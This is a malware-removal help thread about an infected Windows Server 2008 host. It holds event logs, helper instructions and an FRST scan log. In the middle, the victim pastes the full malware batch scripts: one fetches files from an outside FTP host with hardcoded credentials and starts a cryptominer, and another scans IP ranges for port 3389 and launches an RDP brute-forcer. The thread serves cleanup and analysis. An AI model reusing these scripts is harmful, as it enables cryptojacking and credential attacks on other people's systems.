 Version:      Previous Signature Version: 1.165.3804.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 8:18:28 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the NlaSvc service.
 
Error - 2/11/2014 9:25:10 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3833.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 9:29:23 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the NlaSvc service.
 
Error - 2/11/2014 9:52:31 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3843.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/12/2014 5:52:32 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3843.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/12/2014 9:28:42 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = Service Control Manager | ID = 7011
Description = A timeout (30000 milliseconds) was reached while waiting for a transaction
 response from the UmRdpService service.
 
Error - 2/12/2014 9:45:49 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = UmrdpService | ID = 1111
Description = Driver Microsoft XPS Document Writer v4 required for printer Microsoft
 XPS Document Writer is unknown. Contact the administrator to install the driver
 before you log in again.
 
 
< End of report >
 

Link to post
Share on other sites

  • Root Admin

Okay well right off the bat I see a lot of CMD files which are basically batch files located here

C:\Windows\SysWow64\tmp62.cmd

C:\Windows\SysWow64\tmp61.cmd

C:\Windows\SysWow64\tmp59.cmd

There are many more listed. Please find and open a couple of them with NOTEPAD and see what they say and what they're doing and let me know. If possible please post the content from one of them here as well.

You also have a firewall setting for at least one application that does not even seem to be known to Google

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{16E8CF16-C14B-46FD-A69D-48BBCEAEF1CC}" = dir=in | app=%systemroot%\mtc\mtc_minerd32.exe |

"{17F45A38-1DA1-416D-AD62-5FA9B9E89800}" = dir=in | app=%systemroot%\xpm\xpm_minerd32.exe |

"{2BDCC1FF-583A-4889-9217-368DFE7FD7DF}" = dir=in | app=%systemroot%\pts\pts_minerd.exe |

"{4BA5D8AA-E41E-476D-86A2-D37F55373783}" = dir=out | app=%systemroot%\pts\pts_minerd32.exe |

"{5CA8A5F9-B39E-45B3-80E1-CEE3C2979218}" = dir=in | app=%systemroot%\tanechka\realvnc.exe |

"{75A08EE6-03EA-4B12-A3D0-48081187B980}" = dir=in | app=%systemroot%\xpm\xpm_minerd.exe |

"{93D58FB7-CBBC-4869-B15A-C01CA6293474}" = dir=out | app=%systemroot%\xpm\xpm_minerd32.exe |

"{A49A6938-87B8-4832-96E8-F3B585E59502}" = dir=out | app=%systemroot%\mtc\mtc_minerd32.exe |

"{BD32485C-F3A8-4AA5-8CD2-5D36318E93A5}" = dir=out | app=%systemroot%\pts\pts_minerd.exe |

"{BD65746C-07B8-4D6C-BD9C-B54E0BA8EC04}" = dir=in | app=%systemroot%\pts\pts_minerd32.exe |

"{D5FF61DA-DAD1-4814-BA3D-19F6A57E6974}" = dir=out | app=%systemroot%\tanechka\realvnc.exe |

"{E2498AEA-ADD8-46F8-AA0B-036513D318CD}" = dir=in | app=%systemroot%\mtc\mtc_minerd.exe |

"{E5A2FBE6-D0F1-4AA6-8FDC-847CA10026A0}" = dir=out | app=%systemroot%\tanechka\svchosl.exe |

"{EC4365F0-A777-4BD5-9D9D-08A41F65ED36}" = dir=out | app=%systemroot%\mtc\mtc_minerd.exe |

"{F4FC679D-1A41-47E3-BEC3-9A28E9D4724A}" = dir=out | app=%systemroot%\xpm\xpm_minerd.exe |

"{F7BC4FD0-CB22-4D68-B55B-0C3867E651C2}" = dir=in | app=%systemroot%\tanechka\svchosl.exe |

What is this file: mtc_minerd.exe are all of those files and entries valid for you? Please double check all of them and if not valid then fix or remove them. If the files or folders in question are not valid then remove, move them as well and rename so they cannot be used while you continue to investigate.

Check those GUI values out in the Registry and see what else they point to.

Let me know about that stuff and then we'll continue on from there.

Link to post
Share on other sites

Those firewall entries were made by me to cripple the malware's ability to do... whatever. Mostly flood the network. They're all Blocks. mtc_minerd.exe (and similar files) seems to be some sort of BitCoin miner.

I have now renamed all folders involved.

 

Contents of tmp1.cmd

%windir%\tanechka\rdbrute.cmd -us

 

Contents of tmp5.cmd

echo off

set f_stop=0

set host=q968787.homenet.org
rem set host=q968787.ignorelist.com
rem set host=q968787.mooo.com
set user=ftpadmin
set passwd=mPhew8Hw

set project=ric
set bindir=%windir%\%project%
set minexe=%project%_minerd.exe
set minexe32=%project%_minerd32.exe

mkdir %bindir%
cd %bindir%

taskkill /F /IM ftp.exe
taskkill /F /IM %minexe%
taskkill /F /IM %minexe32%

echo open %host% > ftp.log
echo quote USER %user% >> ftp.log
echo quote PASS %passwd% >> ftp.log
echo cd %project% >> ftp.log
echo get files.txt >> ftp.log
echo bye >> ftp.log
ftp.exe -i -n -s:ftp.log
del ftp.log

echo open %host% > ftp.log
echo quote USER %user% >> ftp.log
echo quote PASS %passwd% >> ftp.log
echo cd %project% >> ftp.log

for /F "eol= tokens=1,2 delims=; " %%i in (files.txt) do (
   call :getfile %%i %%j
)

echo bye >> ftp.log
ftp.exe -i -n -s:ftp.log
del ftp.log

if %f_stop%==1 goto :exit

start /low %minexe% -o ypool.net -u q968787.%project%_1 -p x

tasklist | findstr %minexe% >tasklist.tmp
for /F "eol=| tokens=1,2 delims==" %%i in (tasklist.tmp) do (
   goto :exit
)

start /low %minexe32% -o ypool.net -u q968787.%project%_1 -p x

:exit
del %0
exit

:getfile
if exist %1 (
   call :check %1 %2
) else (
   echo get %1 >> ftp.log
)
exit /b

:check
if %~z1 neq %2 (
   echo get %1 >> ftp.log
)
exit /b

 

Contents of tmp5.cmd

%windir%\tanechka\rdbrute.cmd -clear

 

All other batch files have similar contents.

 

Contents of rdbrute.cmd

c:
set outdir=c:\windows\tanechka\
cd %outdir%

set f_clear=0
set f_test=0
for %%i in (%*) do if /i "%%i"=="-clear" set f_clear=1
for %%i in (%*) do if /i "%%i"=="-test" set f_test=1

set country="undef"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-us" set country="us"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-europe" set country="europe"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-asia" set country="asia"
if %country%=="undef" for %%i in (%*) do if /i "%%i"=="-america" set country="america"

set scan_exe=realvnc.exe
set brute_exe=svchosl.exe

set ranges=ranges.txt

set source=source.txt
set users=users2.txt
set passwd=passwd2.txt
set ips=result_ip.txt

if %country%=="us" (
   set ranges=ranges_us.txt
) else if %country%=="europe" (
   set ranges=ranges_europe.txt
) else if %country%=="asia" (
   set ranges=ranges_asia.txt
) else if %country%=="america" (
   set ranges=ranges_america.txt
)

del break.status
if %f_clear%==1 goto :clear

taskkill /F /IM %brute_exe%
for /F "eol=| tokens=1,2 delims==" %%i in (config.ini) do (
   if %%i==Running (
      if %%j==1 (
         goto :start_brute
      )
   )
)

tasklist | findstr %scan_exe% >tasklist.tmp
for /F "eol=| tokens=1,2 delims==" %%i in (tasklist.tmp) do (
   goto :exit
)

:start_genranges
:: ïåðåòàñóåì èíòåðâàëû
if %f_test%==1 (
   echo 24.0.0.0-24.0.255.255 > scan_ranges.txt
   echo 24.1.0.0-24.1.255.255 >> scan_ranges.txt
   echo 24.2.0.0-24.2.255.255 >> scan_ranges.txt
   goto :start_scan
)
:: ïîëó÷àåì ñëó÷àéíûå äèàïàçîíû
random.exe %ranges%
for /f %%n in ( 'more ^< "%ranges%.random" ^| find /c /v ""' ) do (
   set lines_count=%%n
)
set /a lines_count-=100
:: Âûâåñòè n ïîñëåäíèõ ñòðîê èç ôàéëà
more +%lines_count% "%ranges%.random" > scan_ranges.txt

:start_scan
for /F "eol=¦ tokens=1 delims=" %%i in (scan_ranges.txt) do (
   if exist break.status goto :exit
   start %scan_exe% -i %%i -p 3389 -cT -T 2900
   sleep 300
)
if %f_test%==0 sleep 2400

taskkill /F /IM %scan_exe%

findstr /c:":3389" VNC_bypauth.txt > vnc1.tmp
for /F "eol=¹ tokens=1 delims=: " %%i in (vnc1.tmp) do echo %%i >> %ips%
del vnc1.tmp
del VNC_bypauth.txt
del scan_ranges.txt

:make_source
taskkill /F /IM %brute_exe%

del config.ini
echo Source=%source% >>config.ini
echo Bad=bad.txt >>config.ini
echo Good=good.txt >>config.ini
echo Error=error.txt >>config.ini
echo Thread=200 >>config.ini
echo TryConnect=2 >>config.ini
echo TimeOut=20.000000 >>config.ini
echo AutoSave=1.000000 >>config.ini
echo Restore=1 >>config.ini
echo Running=1 >>config.ini

del %source%
echo [Login]>>%source%
for /F "eol=¦ tokens=1 delims=" %%i in (%users%) do @echo %%i>>%source%

echo [Password]>>%source%
for /F "eol=¦ tokens=1 delims=" %%i in (%passwd%) do @echo %%i>>%source%

echo [iP]>>%source%
for /F "eol=¦ tokens=1 delims=" %%i in (%ips%) do @echo %%i-0>>%source%
del %ips%

:start_brute
start %brute_exe%
goto :exit

:clear
echo break > break.status
taskkill /F /IM %scan_exe%
taskkill /F /IM %brute_exe%

del VNC_bypauth.txt
del config.ini
del scan_ranges.txt

del bad.txt
del error.txt

:exit

Link to post
Share on other sites

  • Root Admin

So why are you using so many batch files?  Wouldn't one do what you're wanting to do?

 

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.


 

Link to post
Share on other sites

I didn't create those batch files... malware did...

 

FRST Log:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-02-2014
Ran by Administrator (administrator) on COMPANY-HV on 19-02-2014 09:36:04
Running from C:\Users\administrator.COMPANY\Desktop
Windows Server 2008 R2 Standard Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 10
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\system32\LogonUI.exe
(Hewlett-Packard Company) C:\Program Files\HP\Cissesrv\cissesrv.exe
(Hewlett-Packard Company) C:\Windows\system32\cpqrcmc.exe
(Hewlett-Packard Company) C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe
() C:\Windows\system32\sclient.exe
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Hewlett-Packard Company) C:\Windows\system32\sysdown.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\smhstart.exe
(Hewlett-Packard Company) C:\Windows\system32\CPQNiMgt\cpqnimgt.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe
(Microsoft Corporation) C:\Windows\system32\vmms.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\hpsmhd.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Hewlett-Packard Company) C:\hp\hpsmh\bin\rotatelogs.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe
(Microsoft Corporation) C:\Windows\System32\vmwp.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\ftp.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Hewlett-Packard Company) C:\Program Files\HP\NCU\cpqteam.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corp.) C:\Program Files\System Center Operations Manager\Gateway\MonitoringHost.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [CPQTEAM] - C:\Program Files\HP\NCU\cpqteam.exe [73728 2010-04-27] (Hewlett-Packard Company)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1436224 2010-11-30] (Microsoft Corporation)
Winlogon\Notify\AtiExtEvent: Ati2evxx.dll [X]
HKLM\...\Policies\Explorer: [showSuperHidden] 1
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
Lsa: [Notification Packages] scecli rassfm

==================== Internet (Whitelisted) ====================


HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
DPF: HKLM-x32 {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab
Handler: hpapp\Apps - No CLSID Value -
Handler-x32: hpapp\Apps - No CLSID Value -
Hosts: 188.122.70.10         scom01.asapnet.local
Tcpip\..\Interfaces\{C7B52165-FFD6-4475-A339-E29F9F34975A}: [NameServer]192.168.10.11,8.8.8.8

==================== Services (Whitelisted) =================

S4 AdtAgent; C:\Windows\system32\AdtAgent.exe [407176 2012-10-30] (Microsoft Corporation)
S4 CIMnotify; C:\Windows\system32\CIMntfy\cimntfy.exe [268392 2010-05-26] (Hewlett-Packard Company)
R2 Cissesrv; C:\Program Files\HP\Cissesrv\cissesrv.exe [167424 2010-03-19] (Hewlett-Packard Company)
R2 CpqNicMgmt; C:\Windows\system32\CPQNiMgt\cpqnimgt.exe [9728 2010-04-28] (Hewlett-Packard Company)
R2 CpqRcmc; C:\Windows\system32\cpqrcmc.exe [22568 2008-11-14] (Hewlett-Packard Company)
R2 cpqvcagent; C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe [1307648 2010-03-25] (Hewlett-Packard Company)
R2 CqMgHost; C:\Windows\system32\CpqMgmt\cqmghost\cqmghost.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgServ; C:\Windows\system32\CpqMgmt\cqmgserv\cqmgserv.exe [15464 2010-05-26] (Hewlett-Packard Company)
R2 CqMgStor; C:\Windows\system32\CpqMgmt\cqmgstor\cqmgstor.exe [20992 2010-04-09] (Hewlett-Packard Company)
S3 FCRegSvc; C:\Windows\system32\FCRegSvc.dll [25600 2009-07-14] (Microsoft Corporation)
R2 HealthService; C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe [25200 2012-10-30] (Microsoft Corp.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe [12784 2010-11-11] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [282616 2010-11-11] (Microsoft Corporation)
R2 nvspwmi; C:\Windows\system32\nvspwmi.dll [407040 2010-11-21] (Microsoft Corporation)
S3 RSoPProv; C:\Windows\system32\RSoPProv.exe [91648 2009-07-14] (Microsoft Corporation)
S3 sacsvr; C:\Windows\system32\sacsvr.dll [14848 2009-07-14] (Microsoft Corporation)
R2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2010-11-21] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2010-11-21] (Microsoft Corporation)
R2 sysdown; C:\Windows\system32\sysdown.exe [17960 2010-01-25] (Hewlett-Packard Company)
R2 SysMgmtHp; C:\hp\hpsmh\bin\smhstart.exe [2041856 2010-01-28] (Hewlett-Packard Company)
S4 System Center Management APM; C:\Program Files\System Center Operations Manager\Gateway\APMDOTNETAgent\InterceptSvc.exe [633968 2012-10-30] (Microsoft Corp.)
R2 vhdsvc; C:\Windows\system32\vhdsvc.dll [193024 2010-11-21] (Microsoft Corporation)
R2 vmms; C:\Windows\system32\vmms.exe [4625408 2010-11-21] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 ati2mtag; C:\Windows\System32\DRIVERS\ati2mtag.sys [2210816 2009-06-24] (ATI Technologies Inc.)
R3 CpqCiDrv; C:\Windows\System32\DRIVERS\cpqcidrv.sys [51752 2009-05-11] (Hewlett-Packard Company)
S3 CPQTeam; C:\Windows\System32\DRIVERS\cpqteam.sys [225792 2010-02-24] (Hewlett-Packard Company)
R0 HpCISSs2; C:\Windows\System32\DRIVERS\HpCISSs2.sys [156776 2010-02-22] (Hewlett-Packard Company)
R0 hpqilo2; C:\Windows\System32\DRIVERS\hpqilo2.sys [160296 2010-01-25] (Hewlett-Packard Company)
R1 hvboot; C:\Windows\System32\drivers\hvboot.sys [119168 2010-11-21] (Microsoft Corporation)
S3 ioatdma; C:\Windows\System32\Drivers\qd260x64.sys [35328 2009-06-10] (Intel Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [188928 2010-10-24] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [72064 2010-10-24] (Microsoft Corporation)
R3 passthruparser; C:\Windows\System32\drivers\passthruparser.sys [20992 2010-11-21] (Microsoft Corporation)
R3 q57nd60a; C:\Windows\System32\DRIVERS\b57nd60a.sys [384040 2010-04-30] (Broadcom Corporation)
S0 sacdrv; C:\Windows\System32\DRIVERS\sacdrv.sys [96320 2009-07-14] (Microsoft Corporation)
R3 vhdparser; C:\Windows\System32\drivers\vhdparser.sys [17408 2010-11-21] (Microsoft Corporation)
R3 VMSMP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)
S3 VMSP; C:\Windows\System32\DRIVERS\vmswitch.sys [407552 2011-05-14] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

NETSVC: sacsvr -> C:\Windows\system32\sacsvr.dll (Microsoft Corporation)

==================== One Month Created Files and Folders ========

2014-02-19 09:36 - 2014-02-19 09:36 - 00008460 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-19 09:35 - 2014-02-19 09:35 - 02153472 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-19 09:33 - 2014-02-19 09:36 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-18 19:55 - 2014-02-18 19:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp24.cmd
2014-02-18 19:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:51 - 2014-02-18 19:51 - 00000034 _____ () C:\Windows\SysWOW64\tmp23.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00001352 _____ () C:\Windows\SysWOW64\tmp22.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00000000 ____D () C:\Windows\mtc
2014-02-18 19:41 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-18 19:38 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\ric
2014-02-18 19:38 - 2014-02-18 19:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp20.cmd
2014-02-15 14:23 - 2014-02-17 17:14 - 00000000 ____D () C:\Windows\ric_
2014-02-12 14:51 - 2014-02-12 14:51 - 00050740 _____ () C:\Users\administrator.COMPANY\Desktop\Extras.Txt
2014-02-12 14:50 - 2014-02-12 14:50 - 00060036 _____ () C:\Users\administrator.COMPANY\Desktop\OTL.Txt
2014-02-12 14:47 - 2014-02-12 14:47 - 00602112 _____ (OldTimer Tools) C:\Users\administrator.COMPANY\Desktop\OTL.exe
2014-02-07 15:04 - 2014-02-17 17:22 - 00000000 ____D () C:\Windows\mtc_
2014-02-07 14:57 - 2014-02-17 17:18 - 00000000 ____D () C:\Windows\pts_
2014-02-07 14:45 - 2014-02-15 09:21 - 00000000 ____D () C:\Windows\xpm_
2014-02-07 14:42 - 2014-02-18 02:29 - 00000000 ____D () C:\Windows\tanechka_
2014-02-05 11:04 - 2014-02-05 11:04 - 04380160 _____ () C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
2014-02-05 09:53 - 2014-02-19 09:36 - 00000000 ____D () C:\FRST
2014-01-29 14:03 - 2014-01-29 14:03 - 00119000 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-01-29 14:03 - 2014-01-29 14:03 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-01-29 09:39 - 2014-01-29 09:39 - 00001105 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-01-29 09:38 - 2014-01-29 09:39 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-29 09:38 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-29 09:34 - 2014-01-29 09:34 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-01-26 19:52 - 2014-01-26 19:52 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2014-01-26 19:47 - 2014-02-14 13:59 - 00001990 ____H () C:\Users\administrator.COMPANY\Documents\Default.rdp
2014-01-26 03:02 - 2014-01-26 03:02 - 00001142 _____ () C:\Users\Administrator\AppData\Local\Temp\MpCmdRun.log
2014-01-26 03:01 - 2014-01-29 10:47 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Temp\{FCE3A33B-4372-4641-8EDD-96B2A575AD29}
2014-01-26 02:56 - 2014-02-19 09:34 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-01-26 02:56 - 2014-02-19 09:12 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-01-26 02:56 - 2014-02-11 01:07 - 00003908 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-01-26 02:56 - 2014-02-11 01:07 - 00003656 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-01-26 02:56 - 2014-01-26 02:56 - 00000000 ____D () C:\Users\Administrator\AppData\Roaming\Macromedia
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\SysWOW64\Macromed
2014-01-26 02:55 - 2014-01-26 02:55 - 00000000 ____D () C:\Windows\system32\Macromed
2014-01-23 12:58 - 2014-01-23 12:58 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Roaming\Malwarebytes
2014-01-23 12:08 - 2014-01-29 09:31 - 00000000 ____D () C:\Program Files\ThreatExpert Memory Scanner
2014-01-23 12:08 - 2014-01-23 12:08 - 01536352 _____ (Threat Expert Ltd. ) C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
2014-01-23 12:08 - 2014-01-23 12:08 - 00000890 _____ () C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
2014-01-23 11:36 - 2014-01-29 14:08 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-01-23 11:36 - 2014-01-23 11:36 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-01-23 11:20 - 2014-01-23 11:20 - 12589848 _____ (Malwarebytes Corp.) C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
2014-01-23 11:11 - 2014-01-23 11:11 - 00000000 ____D () C:\Windows\ERUNT
2014-01-23 11:10 - 2014-01-23 11:10 - 01037068 _____ (Thisisu) C:\Users\administrator.COMPANY\Desktop\JRT.exe
2014-01-23 11:08 - 2014-01-29 09:34 - 00000000 ____D () C:\AdwCleaner
2014-01-23 11:06 - 2014-01-23 11:06 - 01236282 _____ () C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
2014-01-23 11:03 - 2014-01-23 11:03 - 05173757 _____ (Swearware) C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
2014-01-23 10:43 - 2014-01-23 10:52 - 00000000 ____D () C:\Users\administrator.COMPANY\Desktop\RK_Quarantine
2014-01-20 15:17 - 2014-01-19 08:33 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-01-20 15:16 - 2014-01-26 19:52 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-01-20 15:15 - 2014-01-26 19:52 - 00707672 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-01-20 15:13 - 2014-01-20 15:13 - 00000468 _____ () C:\Users\administrator.COMPANY\AppData\Local\Temp\chrome_installer.log
2014-01-20 15:08 - 2014-01-20 16:01 - 00000000 ____D () C:\Kaspersky Rescue Disk 10.0

==================== One Month Modified Files and Folders =======

2014-02-19 09:36 - 2014-02-19 09:36 - 00008460 _____ () C:\Users\administrator.COMPANY\Desktop\FRST.txt
2014-02-19 09:36 - 2014-02-19 09:33 - 00000000 ____D () C:\Users\administrator.COMPANY\AppData\Local\Temp\2
2014-02-19 09:36 - 2014-02-05 09:53 - 00000000 ____D () C:\FRST
2014-02-19 09:35 - 2014-02-19 09:35 - 02153472 _____ (Farbar) C:\Users\administrator.COMPANY\Desktop\FRST64.exe
2014-02-19 09:34 - 2014-01-26 02:56 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-02-19 09:33 - 2013-12-01 10:23 - 00000136 _____ () C:\Windows\system32\config\netlogon.ftl
2014-02-19 09:31 - 2013-11-30 11:20 - 01118029 _____ () C:\Windows\WindowsUpdate.log
2014-02-19 09:12 - 2014-01-26 02:56 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-02-18 19:58 - 2013-12-07 07:20 - 00006491 _____ () C:\Windows\SysWOW64\sclient.log
2014-02-18 19:55 - 2014-02-18 19:55 - 00000894 _____ () C:\Windows\SysWOW64\tmp24.cmd
2014-02-18 19:55 - 2014-02-18 19:55 - 00000000 ____D () C:\Windows\tanechka
2014-02-18 19:51 - 2014-02-18 19:51 - 00000034 _____ () C:\Windows\SysWOW64\tmp23.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00001352 _____ () C:\Windows\SysWOW64\tmp22.cmd
2014-02-18 19:44 - 2014-02-18 19:44 - 00000000 ____D () C:\Windows\mtc
2014-02-18 19:41 - 2014-02-18 19:41 - 00000000 ____D () C:\Windows\pts
2014-02-18 19:41 - 2014-02-18 19:38 - 00000000 ____D () C:\Windows\ric
2014-02-18 19:38 - 2014-02-18 19:38 - 00001380 _____ () C:\Windows\SysWOW64\tmp20.cmd
2014-02-18 09:43 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-02-18 09:43 - 2009-07-14 05:49 - 00021328 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-02-18 02:29 - 2014-02-07 14:42 - 00000000 ____D () C:\Windows\tanechka_
2014-02-17 17:22 - 2014-02-07 15:04 - 00000000 ____D () C:\Windows\mtc_
